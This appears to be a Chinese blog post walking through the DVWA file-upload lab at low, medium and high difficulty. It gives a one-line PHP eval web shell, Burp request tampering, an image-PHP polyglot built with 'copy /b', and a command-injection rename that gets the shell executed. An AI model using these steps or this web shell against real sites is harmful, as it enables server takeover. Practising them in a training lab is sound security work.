6.21.2 dvwa靶场文件上传

low

直接上传php,使用蚁剑进行连接

123.php

<?php @eval($_POST['attack']);?>

medium

使用burp进行抓包改包

123.jpg  在burp改包成123.php

添加木马路径

 

 使用蚁剑/菜刀进行连接

high

(2条消息) DVWA1.9之文件上传漏洞High级多种方法_文件上传high_晚安這個未知的世界的博客-CSDN博客

(2条消息) 基于DVWA文件上传,包含漏洞,上传一句话木马基础分析_dvwa一句话木马_Alexz__的博客-CSDN博客

 DVWA 通关指南:File Upload(文件上传) - 乌漆WhiteMoon - 博客园 (cnblogs.com)

使用抓包改包

但后台有函数进行图片辨别,没有宽高,被识别成假图片 不允许上传

利用一句话木马和图片生成一句话木马图片

在cmd中   copy /b 8888.jpg + 123.php xiaoma.jpg

上传xiaoma.jpg

 

但是不能解析成php

借助漏洞比如low的命令注入:

127.0.0.1 & rename  xiaoma.jpg路径  xiaoma.php

(前提是知道图片地址,在这个案例,上传后就会有地址)

地址栏输入

使用菜刀和蚁剑连接木马的链接

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值